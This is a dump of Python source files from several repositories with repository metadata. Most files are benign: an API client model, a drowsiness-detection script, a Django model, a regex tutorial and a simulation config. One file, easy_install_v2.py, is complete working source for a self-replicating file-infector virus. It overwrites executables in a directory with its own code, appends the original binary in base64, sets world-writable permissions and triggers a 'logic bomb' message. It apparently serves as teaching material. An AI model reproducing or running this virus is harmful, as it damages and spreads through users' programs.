| blob_id stringlengths 40–40 | directory_id stringlengths 40–40 | path stringlengths 3–281 | content_id stringlengths 40–40 | detected_licenses listlengths 0–57 | license_type stringclasses 2 values | repo_name stringlengths 6–116 | snapshot_id stringlengths 40–40 | revision_id stringlengths 40–40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k–668M ⌀ | star_events_count int64 0–102k | fork_events_count int64 0–38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4–6.02M | extension stringclasses 78 values | content stringlengths 2–6.02M | authors listlengths 1–1 | author stringlengths 0–175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
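The rows below follow this schema. A minimal sketch of streaming such a dump, assuming it is hosted as a Hugging Face dataset (the dataset path here is a hypothetical placeholder, and the `datasets` library must be installed):

```python
from datasets import load_dataset

# Hypothetical dataset path -- substitute the actual one for this dump.
ds = load_dataset("some-org/python-source-dump", split="train", streaming=True)
for row in ds.take(2):
    print(row["repo_name"], row["path"], row["length_bytes"])
```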
b0b09977413df66d842b53b5df6ee0e5dec3c57e
|
34096e5f3d6569e3aaee794bf8ccc0b04f2c8c8f
|
/docusign_esign/models/offline_attributes.py
|
077596d786a847ed9812880ca9dd352e3e55323a
|
[
"MIT"
] |
permissive
|
hunk/docusign-python-client
|
5c96de8a08973fe1744d902b2a3873a7376a62c7
|
a643c42c1236715e74eef6fc279a1b29da1b5455
|
refs/heads/master
| 2021-06-14T06:41:23.298368
| 2020-04-01T05:51:08
| 2020-04-01T05:51:08
| 254,482,059
| 0
| 0
|
MIT
| 2020-04-09T21:28:23
| 2020-04-09T21:28:23
| null |
UTF-8
|
Python
| false
| false
| 7,470
|
py
|
# coding: utf-8
"""
DocuSign REST API
The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign.
OpenAPI spec version: v2.1
Contact: devcenter@docusign.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class OfflineAttributes(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, account_esign_id=None, device_model=None, device_name=None, gps_latitude=None, gps_longitude=None, offline_signing_hash=None):
"""
OfflineAttributes - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'account_esign_id': 'str',
'device_model': 'str',
'device_name': 'str',
'gps_latitude': 'str',
'gps_longitude': 'str',
'offline_signing_hash': 'str'
}
self.attribute_map = {
'account_esign_id': 'accountEsignId',
'device_model': 'deviceModel',
'device_name': 'deviceName',
'gps_latitude': 'gpsLatitude',
'gps_longitude': 'gpsLongitude',
'offline_signing_hash': 'offlineSigningHash'
}
self._account_esign_id = account_esign_id
self._device_model = device_model
self._device_name = device_name
self._gps_latitude = gps_latitude
self._gps_longitude = gps_longitude
self._offline_signing_hash = offline_signing_hash
@property
def account_esign_id(self):
"""
Gets the account_esign_id of this OfflineAttributes.
A GUID identifying the account associated with the consumer disclosure
:return: The account_esign_id of this OfflineAttributes.
:rtype: str
"""
return self._account_esign_id
@account_esign_id.setter
def account_esign_id(self, account_esign_id):
"""
Sets the account_esign_id of this OfflineAttributes.
A GUID identifying the account associated with the consumer disclosure
:param account_esign_id: The account_esign_id of this OfflineAttributes.
:type: str
"""
self._account_esign_id = account_esign_id
@property
def device_model(self):
"""
Gets the device_model of this OfflineAttributes.
A string containing information about the model of the device used for offline signing.
:return: The device_model of this OfflineAttributes.
:rtype: str
"""
return self._device_model
@device_model.setter
def device_model(self, device_model):
"""
Sets the device_model of this OfflineAttributes.
A string containing information about the model of the device used for offline signing.
:param device_model: The device_model of this OfflineAttributes.
:type: str
"""
self._device_model = device_model
@property
def device_name(self):
"""
Gets the device_name of this OfflineAttributes.
A string containing information about the type of device used for offline signing.
:return: The device_name of this OfflineAttributes.
:rtype: str
"""
return self._device_name
@device_name.setter
def device_name(self, device_name):
"""
Sets the device_name of this OfflineAttributes.
A string containing information about the type of device used for offline signing.
:param device_name: The device_name of this OfflineAttributes.
:type: str
"""
self._device_name = device_name
@property
def gps_latitude(self):
"""
Gets the gps_latitude of this OfflineAttributes.
A string containing the latitude of the device location at the time of signing.
:return: The gps_latitude of this OfflineAttributes.
:rtype: str
"""
return self._gps_latitude
@gps_latitude.setter
def gps_latitude(self, gps_latitude):
"""
Sets the gps_latitude of this OfflineAttributes.
A string containing the latitude of the device location at the time of signing.
:param gps_latitude: The gps_latitude of this OfflineAttributes.
:type: str
"""
self._gps_latitude = gps_latitude
@property
def gps_longitude(self):
"""
Gets the gps_longitude of this OfflineAttributes.
A string containing the longitude of the device location at the time of signing.
:return: The gps_longitude of this OfflineAttributes.
:rtype: str
"""
return self._gps_longitude
@gps_longitude.setter
def gps_longitude(self, gps_longitude):
"""
Sets the gps_longitude of this OfflineAttributes.
A string containing the longitude of the device location at the time of signing.
:param gps_longitude: The gps_longitude of this OfflineAttributes.
:type: str
"""
self._gps_longitude = gps_longitude
@property
def offline_signing_hash(self):
"""
Gets the offline_signing_hash of this OfflineAttributes.
:return: The offline_signing_hash of this OfflineAttributes.
:rtype: str
"""
return self._offline_signing_hash
@offline_signing_hash.setter
def offline_signing_hash(self, offline_signing_hash):
"""
Sets the offline_signing_hash of this OfflineAttributes.
:param offline_signing_hash: The offline_signing_hash of this OfflineAttributes.
:type: str
"""
self._offline_signing_hash = offline_signing_hash
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
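A brief usage sketch for the generated model above (not part of the original file; the attribute values are made up):

```python
# Construct the model with keyword arguments and serialize it via to_dict().
attrs = OfflineAttributes(
    device_model='iPad7,5',
    device_name='tablet',
    gps_latitude='52.5200',
    gps_longitude='13.4050',
)
print(attrs.to_dict())   # unset fields come back as None
print(attrs)             # __repr__ delegates to to_str()/pformat
```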
|
[
"noreply@github.com"
] |
noreply@github.com
|
ab0b8196c759f436a72d4ad731e16756cc9d4511
|
699cf40f6326b954a40b78e87317a62401bd4c2c
|
/.history/Drowsy_Detection_20210728124624.py
|
935884724404299f8e03c238ed4ff5289a4858c5
|
[] |
no_license
|
KhanhNguyen1308/Python-mediapippe
|
e3927f9c0c6499d8a3ba50a675617b89197dce89
|
981412efd39bd29c34a66afbec88abdabcb47ab9
|
refs/heads/main
| 2023-06-25T18:37:43.234063
| 2021-07-29T11:35:31
| 2021-07-29T11:35:31
| 368,535,068
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,727
|
py
|
import cv2
import time
import numpy as np
import mediapipe as mp
import tensorflow as tf
from threading import Thread
from head_pose_ratio import head_pose_ratio
from function import draw_point, eye_avg_ratio, put_text
from Angle_head_pose_ratio import head_pose_status, eye_stat
from mode import sleep_mode
interpreter = tf.lite.Interpreter('model.tflite')
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
cap = cv2.VideoCapture('Video/test_1406.mp4')
# cap = cv2.VideoCapture(0)
pTime = 0
time_active = 0
m = 0
status = ''
mpDraw = mp.solutions.drawing_utils
mpFaceMesh = mp.solutions.face_mesh
faceMesh = mpFaceMesh.FaceMesh()
drawSpec = mpDraw.DrawingSpec(thickness=1, circle_radius=2)
eye_status = ''
x_status = ''
y_status = ''
z_status = ''
head_status = ''
Drowsy_mode = ''
draw = False
t = 0
ear = 0
start_time = time.time()
count = 0
blink = 0
blink_perM = 0
pre_blink = 0
while True:
ret, img = cap.read()
if not ret:
    break  # end of the video stream; avoids crashing on img=None
ih, iw = img.shape[0], img.shape[1]
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
results = faceMesh.process(imgRGB)
if results:
face = []
Mount = []
Left_eye = []
Right_eye = []
try:
for face_lms in results.multi_face_landmarks:
for lm in face_lms.landmark:
x, y = int(lm.x * iw), int(lm.y * ih)
face.append([x, y])
nose = face[5]
Left_eye.append([face[249], face[374], face[380], face[382], face[385], face[386]])
Right_eye.append([face[7], face[145], face[153], face[155], face[158], face[159]])
Mount.append([face[308], face[317], face[14], face[87], face[61], face[82], face[13], face[312]])
img = draw_point(img, nose, Left_eye, Right_eye, Mount)
ear = eye_avg_ratio(Left_eye, Right_eye)
x1, x2, x3, x4, x5, x6 = head_pose_ratio(nose, Left_eye, Right_eye)
input_shape = input_details[0]['shape']
input_data = np.array((x1, x2, x3, x4, x5, x6), dtype=np.float32)
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
img = cv2.putText(img, str(x5), (nose[0] - 20, nose[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
img = cv2.putText(img, str(x6), (nose[0] + 20, nose[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
head_status, mode = head_pose_status(x5, x6, x2)
eye_status, blink, count = eye_stat(ear, count, blink, mode)
if mode == 1:
print(round(ear, 3))
Drowsy_mode = sleep_mode(mode, ear, blink)
m += 1
except:
eye_status = 'None Face'
x_status = 'None Face'
y_status = 'None Face'
cTime = time.time()
fps = int(1 / (cTime - pTime))
pTime = cTime
img = cv2.putText(img, str(m), (10, 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 1)
text_fps = 'FPS:' + str(fps)
text_EaR = 'Eye_avg_Ratio: ' + str(round(ear, 2))
text_Head_pose = 'Head_pose: ' + head_status
text_ES = 'Eye_Status: ' + eye_status
text_blink = 'Blink_Num: ' + str(blink)
text_blink_avg = 'Blink_AVG: ' + str(blink_perM)
img = put_text(img, text_fps, text_EaR, text_ES, text_blink, text_blink_avg, text_Head_pose)
cv2.imshow('results', img)
if (time.time() - start_time) > 60:
start_time = time.time()
time_active += 1
blink_perM = blink
pre_blink = blink
blink = 0
key = cv2.waitKey(1)
# if m == 900:
# break
if key == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
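The `eye_avg_ratio` helper is imported from an external `function` module that is not included in this file. As a point of reference only — not the repository's actual implementation — a per-eye aspect ratio (EAR) is commonly computed from six landmarks like so:

```python
import numpy as np

def eye_aspect_ratio(eye):
    """eye: six (x, y) landmark pairs around one eye."""
    # Ratio of the two vertical eyelid distances to the horizontal eye
    # width; the value drops toward zero as the eye closes.
    a = np.linalg.norm(np.subtract(eye[1], eye[5]))
    b = np.linalg.norm(np.subtract(eye[2], eye[4]))
    c = np.linalg.norm(np.subtract(eye[0], eye[3]))
    return (a + b) / (2.0 * c)
```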
|
[
"khanhnguyenduy1308@gmail.com"
] |
khanhnguyenduy1308@gmail.com
|
b39d2e8a3337080a1c893fd9b36e4a0743b7a421
|
cf431dd9967ba3de7732541e42412fa9bd2bf4ba
|
/todo/models.py
|
555d0d4228bdccf2f6ba5aa1e9bbc0c89d8b036b
|
[] |
no_license
|
ansu5555/TaskManager
|
de073c53b50fa876118b03f564cea5a51fbc947c
|
a6a743a2fbe9203afc0694f89bbe938ace6f843a
|
refs/heads/master
| 2021-09-06T22:35:08.632556
| 2018-02-12T17:46:27
| 2018-02-12T17:46:27
| 12,598,650
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 294
|
py
|
from django.db import models
# Create your models here.
class todo_lists(models.Model):
todo_crtdt = models.DateTimeField(auto_now_add=True)
todo_detail = models.CharField(max_length=100)
todo_duedt = models.DateTimeField()
todo_complete = models.BooleanField(default=False)
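A quick shell sketch of using this model (assuming migrations have been applied; the field values are made up):

```python
from django.utils import timezone
from todo.models import todo_lists

item = todo_lists.objects.create(
    todo_detail='Write the weekly report',
    todo_duedt=timezone.now(),
)
print(item.todo_complete)  # False by default
```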
|
[
"ansuman5555@gmail.com"
] |
ansuman5555@gmail.com
|
586389d67bfb22c131f65413987a6d9937d948a4
|
085773c6b2945589e60022ba8268d2e93a61145f
|
/cha_10_regular_expression/10_7_match.py
|
1eac13208caf382181b89f4b5903da67f81f838d
|
[] |
no_license
|
bj1570saber/muke_Python_July
|
dde67a74882f0bcc72c1aca828922829376a0375
|
96fa464bd0eeb8a922e713700addb548b6ef4727
|
refs/heads/master
| 2020-09-08T14:08:36.963017
| 2020-01-09T08:54:41
| 2020-01-09T08:54:41
| 221,154,988
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 801
|
py
|
import re
a = 'pyth_pytho0python1pythonn2pythonnnn'
# *: match previous char 'n' 0 or more times
r = re.findall('python*', a)
print(r)# ['pytho', 'python', 'pythonn', 'pythonnnn']
print('~' * 20)
# +: match previous char 'n' 1 or more times
r = re.findall('python+', a)
print(r)# ['python', 'pythonn', 'pythonnnn']
print('~' * 20)
# ?: match previous char 'n' 0 or 1 time
r = re.findall('python?', a)
print(r)#['pytho', 'python', 'python', 'python']
print('~' * 20)
# {m,n}: match previous char 'n' 1 to 3 times
r = re.findall('python{1,3}', a) # accept 1-3 times 'n'.
print(r)#['python', 'pythonn', 'pythonnn']
print('~' * 20)
### ?: after a quantifier forces non-greedy matching
# the quantifier then matches as few 'n' as possible (here: exactly 1)
r = re.findall('python{1,3}?', a) # as few 'n' as possible
print(r)#['python', 'python', 'python']
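One quantifier form not covered above is the open-ended `{m,}`; a small addition in the same style, verified against the same input string `a`:

```python
# {2,}: match previous char 'n' 2 or more times
r = re.findall('python{2,}', a)
print(r)  # ['pythonn', 'pythonnnn']
```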
|
[
"bj1570saber@gmail.com"
] |
bj1570saber@gmail.com
|
904a7bc9b799b09ef6eb6b12445e53839cc08f7b
|
a02a2da4ca761b74544ab0fe819847074930fed8
|
/demos/incompressible_flow/scalar_transport/almgren-two-grids-check-div-eps-1/config.py
|
0da2495e847aad20e2ced600036b7ce982cbbbb6
|
[] |
no_license
|
marc-nguessan/mrpy
|
40ac7a11404ed97ab5824f4dc8fd57e8d51caf95
|
6fb0bce485234a45bb863f71bc2bdf0a22014de3
|
refs/heads/master
| 2020-12-03T08:28:11.312333
| 2020-01-01T19:05:05
| 2020-01-01T19:05:05
| 231,252,927
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,650
|
py
|
"""...
"""
from math import *
# Definition of time integration
t_ini = 0.
t_end = 0.5
nt = 200
dt = (t_end - t_ini) / nt
dt_sc = dt / 20
# Definition of the printing options
n_print = min(nt, 600)
#n_print = nt
dt_print = (t_end - t_ini) / n_print
# domain size
L = 1
x_1 = 0.
y_1 = 0.
x_2 = 0.09
y_2 = 0.
x_3 = -0.045
y_3 = 0.045*sqrt(3)
x_4 = -0.045
y_4 = -0.045*sqrt(3)
x_5 = -0.09
y_5 = 0.
F_1 = -150
F_2 = 50
F_3 = 50
F_4 = 50
F_5 = -100
F_6 = 50
# Definition of the domain dimensions
xmin = -L/2.
xmax = L/2.
ymin = -L/2.
ymax = L/2.
zmin = -L/2.
zmax = L/2.
# Definition of the flow characteristics
Re = 100.
nu = 5.e-4 # (m*m)/s
kappa = 5.e-3 # (m*m)/s
# Tree dimension
dimension = 2
# Trees min_level
min_level = 2
min_level_sc = 2
# Trees max_level
max_level = 7
max_level_sc = 7
# Tree stencil graduation
stencil_graduation = 1
# Tree stencil prediction
stencil_prediction = 1
# Frequency of the multiresolution transform
mr_freq = 10
# function
# def function(x, y, t=0.):
# from math import sin, cos, exp, pi
# return sin(pi*(x+t))*sin(pi*(y+t))
#def function(x):
#
# from math import tanh
#
# return tanh(50.*abs(x-1./2.))
#def function(x, y):
#
# from math import exp, sqrt
#
# return exp(-30.*sqrt((x+0.5)**2 + (y-0.5)**2)) + exp(-30.*sqrt((x-0.5)**2 + (y+0.5)**2))
# Definition of the boundary conditions dictionary bc_dict
# # bc_dict gives the value of the north, south, west and
# # east values of every variables involved in the flow
# # computation
def u_north(coords, t=0.):
#return (Re*nu) / (xmax - xmin)
#return 1.
return 0.
def u_south(coords, t=0.):
#return 1.
return 0.
def u_west(coords, t=0.):
#return 1.
return 0.
def u_east(coords, t=0.):
#return 1.
return 0.
def u_back(coords, t=0.):
#return 1.
return 0.
def u_forth(coords, t=0.):
#return 1.
return 0.
def v_north(coords, t=0.):
#return 1.
return 0.
def v_south(coords, t=0.):
#return 1.
return 0.
def v_west(coords, t=0.):
#return 1.
return 0.
def v_east(coords, t=0.):
#return 1.
return 0.
def v_back(coords, t=0.):
#return 1.
return 0.
def v_forth(coords, t=0.):
#return 1.
return 0.
def p_north(coords, t=0.):
#return 1.
return 0.
def p_south(coords, t=0.):
#return 1.
return 0.
def p_west(coords, t=0.):
#return 1.
return 0.
def p_east(coords, t=0.):
#return 1.
return 0.
def p_back(coords, t=0.):
#return 1.
return 0.
def p_forth(coords, t=0.):
#return 1.
return 0.
def s_north(coords, t=0.):
#return 1.
return 0.
def s_south(coords, t=0.):
#return 1.
return 0.
def s_west(coords, t=0.):
#return 1.
return 0.
def s_east(coords, t=0.):
#return 1.
return 0.
def s_back(coords, t=0.):
#return 1.
return 0.
def s_forth(coords, t=0.):
#return 1.
return 0.
def phi_north(coords, t=0.):
#return 1.
return 0.
def phi_south(coords, t=0.):
#return 1.
return 0.
def phi_west(coords, t=0.):
#return 1.
return 0.
def phi_east(coords, t=0.):
#return 1.
return 0.
def phi_back(coords, t=0.):
#return 1.
return 0.
def phi_forth(coords, t=0.):
#return 1.
return 0.
bc_dict = {"u": {"north": ("neumann", u_north),
#"north": ("dirichlet", u_north),
#"north": ("periodic", u_north),
"south": ("neumann", u_south),
#"south": ("dirichlet", u_south),
#"south": ("periodic", u_south),
"east": ("dirichlet", u_east),
#"east": ("periodic", u_east),
#"east": ("neumann", u_east),
"west": ("dirichlet", u_west),
#"west": ("periodic", u_west),
#"west": ("neumann", u_west),
#"back": ("dirichlet", u_back),
"back": ("periodic", u_back),
#"back": ("neumann", u_back),
#"forth": ("dirichlet", u_forth)},
"forth": ("periodic", u_forth)},
#"forth": ("neumann", u_forth)},
"v": {#"north": ("neumann", v_north),
"north": ("dirichlet", v_north),
#"north": ("periodic", v_north),
#"south": ("neumann", v_south),
"south": ("dirichlet", v_south),
#"south": ("periodic", v_south),
#"east": ("dirichlet", v_east),
#"east": ("periodic", v_east),
"east": ("neumann", v_east),
#"west": ("dirichlet", v_west),
#"west": ("periodic", v_west),
"west": ("neumann", v_west),
#"back": ("dirichlet", v_back),
"back": ("periodic", v_back),
#"back": ("neumann", v_back),
#"forth": ("dirichlet", v_forth),
"forth": ("periodic", v_forth)},
#"forth": ("neumann", v_forth)},
"phi": {#"north": ("neumann", phi_north),
"north": ("dirichlet", phi_north),
#"north": ("periodic", phi_north),
#"south": ("neumann", phi_south),
"south": ("dirichlet", phi_south),
#"south": ("periodic", phi_south),
"east": ("dirichlet", phi_east),
#"east": ("periodic", phi_east),
#"east": ("neumann", phi_east),
"west": ("dirichlet", phi_west),
#"west": ("periodic", phi_west),
#"west": ("neumann", phi_west),
#"back": ("dirichlet", phi_back),
"back": ("periodic", phi_back),
#"back": ("neumann", phi_back),
#"forth": ("dirichlet", phi_forth),
"forth": ("periodic", phi_forth)},
#"forth": ("neumann", phi_forth)},
"s": {"north": ("neumann", s_north),
#"north": ("dirichlet", s_north),
#"north": ("periodic", s_north),
"south": ("neumann", s_south),
#"south": ("dirichlet", s_south),
#"south": ("periodic", s_south),
#"east": ("dirichlet", s_east),
#"east": ("periodic", s_east),
"east": ("neumann", s_east),
#"west": ("dirichlet", s_west),
#"west": ("periodic", s_west),
"west": ("neumann", s_west),
#"back": ("dirichlet", s_back),
"back": ("periodic", s_back),
#"back": ("neumann", s_back),
#"forth": ("dirichlet", s_forth),
"forth": ("periodic", s_forth)},
#"forth": ("neumann", s_forth)},
"p": {"north": ("neumann", p_north),
#"north": ("dirichlet", p_north),
#"north": ("periodic", p_north),
"south": ("neumann", p_south),
#"south": ("dirichlet", p_south),
#"south": ("periodic", p_south),
#"east": ("dirichlet", p_east),
#"east": ("periodic", p_east),
"east": ("neumann", p_east),
#"west": ("dirichlet", p_west),
#"west": ("periodic", p_west),
"west": ("neumann", p_west),
#"back": ("dirichlet", p_back),
#"back": ("periodic", p_back),
"back": ("neumann", p_back),
#"forth": ("dirichlet", p_forth),
#"forth": ("periodic", p_forth)}}
"forth": ("neumann", p_forth)}}
# Name of the prediction operator module used for a given simulation
prediction_operator_module = "mrpy.mr_utils.operators.prediction." + "centered_polynomial_interpolation"
# Threshold parameter
threshold_parameter = 1.e-3
# Threshold speed propagation
threshold_speed_propagation = 1
# Name of the thresholding operator
#thresholding_operator_module = "thresholding_operators." + "harten_thresholding"
thresholding_operator_module = "mrpy.mr_utils.operators.thresholding." + "predictive_thresholding"
# Name of the scheme class used for the time integration
#class_scheme_name = "mrpy.discretization." + "temporal_impl_expl_euler"
class_scheme_name = "mrpy.discretization." + "temporal_radau2A"
# Name of the scheme used for the time integration of the scalar
scalar_scheme = "mrpy.discretization." + "RK4_scalar"
# # Names of the six main spatial operators used for the computation of the
# # simulation: divergence_x, divregence_y, gradient_x, gradient_y, laplacian_x,
# # laplacian_y; the name are divided in two parts:
# # the name of the package where the spatial operators modules are stored and the
# # name of the specific python output module
#gradient_module_name = "mrpy.spatial_operators." + "ctr_poly.2nd_order_ctr_finite_diff.gradient"
gradient_module_name = "mrpy.spatial_operators." + "haar.2nd_order_ctr_finite_diff.gradient"
#divergence_module_name = "mrpy.spatial_operators." + "ctr_poly.2nd_order_ctr_finite_diff.divergence"
divergence_module_name = "spatial_operators." + "haar.2nd_order_ctr_finite_diff.divergence"
#laplacian_module_name = "mrpy.spatial_operators." + "ctr_poly.2nd_order_ctr_finite_diff.laplacian"
#laplacian_module_name = "mrpy.spatial_operators." + "ctr_poly.2nd_order_ctr_finite_diff.laplacian-bis"
laplacian_module_name = "mrpy.spatial_operators." + "haar.2nd_order_ctr_finite_diff.laplacian"
#laplacian_module_name = "mrpy.spatial_operators." + "haar.2nd_order_ctr_finite_diff.laplacian-bis"
#mass_module_name = "mrpy.spatial_operators." + "ctr_poly.2nd_order_ctr_finite_diff.mass"
mass_module_name = "spatial_operators." + "haar.2nd_order_ctr_finite_diff.mass"
#inverse_mass_module_name = "mrpy.spatial_operators." + "ctr_poly.2nd_order_ctr_finite_diff.inverse_mass"
inverse_mass_module_name = "spatial_operators." + "haar.2nd_order_ctr_finite_diff.inverse_mass"
# Name of the output file used to print the solution; it is divided in two parts:
# the name of the package where the input/output modules are stored and the
# name of the specific python output module
#output_module_name = "mrpy.io." + "output-1D-gnuplot"
#output_module_name = "mrpy.io." + "output-tikz"
#output_module_name = "mrpy.io." + "output-2D-gnuplot"
output_module_name = "mrpy.io." + "output-xdmf"
# !!!!!! the section below needs to be modified !!!!!!!!
# Definition of a function that gives the exact value of the x-component of the
# velocity over the domain
# Amplitude of the signal
amp = 1.e+0
def u_exact(x, y, t=0.):
# return pi*cos(pi*x)*sin(pi*y)*exp(-2*pi*pi*nu*t)
#return amp*sin(pi*(x+t))*sin(pi*(y+t))
# return exp(-50*(x**2 + y**2))
return 0.
# Definition of a function that gives the exact value of the y-component of the
# velocity over the domain
def v_exact(x, y, t=0.):
# return -pi*sin(pi*x)*cos(pi*y)*exp(-2*pi*pi*nu*t)
#return amp*cos(pi*(x+t))*cos(pi*(y+t))
# return -exp(-50*(x**2 + y**2))
return 0.
# Definition of a function that gives the exact value of the pressure over the
# domain
def p_exact(x, y, t=0.):
# return (pi*pi)/2.*(sin(pi*x)*sin(pi*x) + sin(pi*y)*sin(pi*y))*exp(-4*pi*pi*nu*t)
#return amp*sin(pi*(x-y+t))
return 1.
def sc_init(x, y, t=0.):
return tanh(100*y)
#if y < 0:
# return 0.
#else:
# return 1.
def omega(x, y, t=0.):
#return 100*(exp(-(1/r_0**2)*((x - x_1)**2 + y**2)) + exp(-(1/r_0**2)*((x - x_2)**2 + y**2)))
#return 0.5*F_1*(1 + tanh(100*(0.03 - sqrt((x - x_1)**2 + (y - y_1)**2)))) + \
# 0.5*F_2*(1 + tanh(100*(0.03 - sqrt((x - x_2)**2 + (y - y_2)**2)))) + \
# 0.5*F_3*(1 + tanh(100*(0.03 - sqrt((x - x_3)**2 + (y - y_3)**2)))) + \
# 0.5*F_4*(1 + tanh(100*(0.03 - sqrt((x - x_4)**2 + (y - y_4)**2))))
return 0.5*F_5*(1 + tanh(100*(0.03 - sqrt((x - x_1)**2 + (y - y_1)**2)))) + \
0.5*F_6*(1 + tanh(100*(0.03 - sqrt((x - x_2)**2 + (y - y_2)**2)))) + \
0.5*F_6*(1 + tanh(100*(0.03 - sqrt((x - x_5)**2 + (y - y_5)**2))))
#return 0.
def source_term_function_velocity_x(x, y, t=0.):
#return pi*(2*amp*nu*pi*sin(pi*(x+t))*sin(pi*(y+t)) + \
# amp*cos(pi*(x-y+t)) + amp*sin(pi*(x+y+2*t)) + \
# amp*amp*sin(pi*(x+t))*cos(pi*(x+t)))
return 0.
def source_term_function_velocity_y(x, y, t=0.):
#return pi*(2*amp*nu*pi*cos(pi*(x+t))*cos(pi*(y+t)) - \
# amp*cos(pi*(x-y+t)) - amp*sin(pi*(x+y+2*t)) - \
# amp*amp*sin(pi*(y+t))*cos(pi*(y+t)))
return 0.
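A short sketch of how a consumer of this config might read one boundary-condition entry, using only names defined above:

```python
kind, func = bc_dict["u"]["north"]
print(kind, func((0.0, ymax)))  # -> neumann 0.0
```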
|
[
"arthur.nguessan@gmail.com"
] |
arthur.nguessan@gmail.com
|
7faacb9fdcd5f1ce0dc6e1a0c84d359a98b04453
|
3f2d56b2191e0aa0b9bae2f6023deee9f2f444be
|
/Libs_et_Modules/easy_install_v2.py
|
732f9124122e336aff75fb51dd532bace00f6510
|
[] |
no_license
|
goffinet/GLMF201
|
8c5a11c7d4a631a95098ae00bc9509929df0a7ca
|
0213ca0fe8cb7bdbee54a128788a7d079394afcb
|
refs/heads/master
| 2021-01-21T11:22:50.099598
| 2017-01-18T14:00:14
| 2017-01-18T14:00:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,566
|
py
|
#!/usr/bin/python3
# === INFECTED ===
import os
from sys import argv
import stat
import random
import base64
import tempfile
cmd_init, cmd = ('ls', 'ls')
pathToCorrupt = '/home/tristan/my_bin/'
fileToCorrupt = pathToCorrupt + cmd
def isInfected(content):
return content == b'# === INFECTED ===\n'
def bomb():
print('BEAAAAAAAAAAH!')
with open(fileToCorrupt, 'rb') as currentFile:
ftcLines = currentFile.readlines()
if isInfected(ftcLines[1]):
filenames = os.listdir(pathToCorrupt)
random.shuffle(filenames)
for cmd in filenames:
if cmd != cmd_init:
with open(pathToCorrupt + cmd, 'rb') as newFile:
ftcLines = newFile.readlines()
if not isInfected(ftcLines[1]):
fileToCorrupt = pathToCorrupt + cmd
break
else:
print('All files already corrupted!')
exit(0)
# ftcLines contains the binary code of the program
ftcLines = b''.join(ftcLines)
# Determine where the original executable code is located
with open(argv[0], 'rb') as currentFile:
content = currentFile.readlines()
startOrigin = False
original = None
virus = []
for i in range(len(content)):
if startOrigin:
original = content[i][2:]
else:
virus.append(content[i])
if content[i] == b'# === ORIGINAL ===\n':
startOrigin = True
# virus contains the virus
# original contains the original binary code
# Erase the executable, write the Python code and append the binary code
print('Infection in progress : command', cmd)
os.remove(fileToCorrupt)
with open(fileToCorrupt, 'wb') as currentFile:
for line in virus:
currentFile.write(line)
currentFile.write(b'# ' + base64.b64encode(ftcLines))
os.chmod(fileToCorrupt, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
# Logic bomb
bomb()
# Execute the original code
try:
if argv[0] != './easy_install_v2.py':
if original is None:
original = ftcLines
temp = tempfile.NamedTemporaryFile(delete=True)
with open(temp.name, 'wb') as tmpCmdFile:
tmpCmdFile.write(base64.b64decode(original))
os.chmod(temp.name, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
temp.file.close()
os.system(temp.name +' ' + ' '.join(argv[1:]))
except:
exit(2)
# === ORIGINAL ===
|
[
"tristan.colombo@gmail.com"
] |
tristan.colombo@gmail.com
|
51e97447fab2edd2d535b5f7d4cd8faff5ee62e1
|
cf833f507001409066a1aa1716161c6fcaea846b
|
/share/qt/clean_mac_info_plist.py
|
ee26b3c1fa50df733839f9002a0fcae496c788f2
|
[
"MIT"
] |
permissive
|
Dubaicash/Dubaicash
|
b963eaa3865eb9e25fac50a5c874944a71845d59
|
5dc7df7271db82691441169b47f2409e209696da
|
refs/heads/master
| 2021-01-25T11:16:00.580273
| 2018-10-29T19:51:15
| 2018-10-29T19:51:15
| 123,389,485
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 899
|
py
|
#!/usr/bin/env python
# Jonas Schnelli, 2013
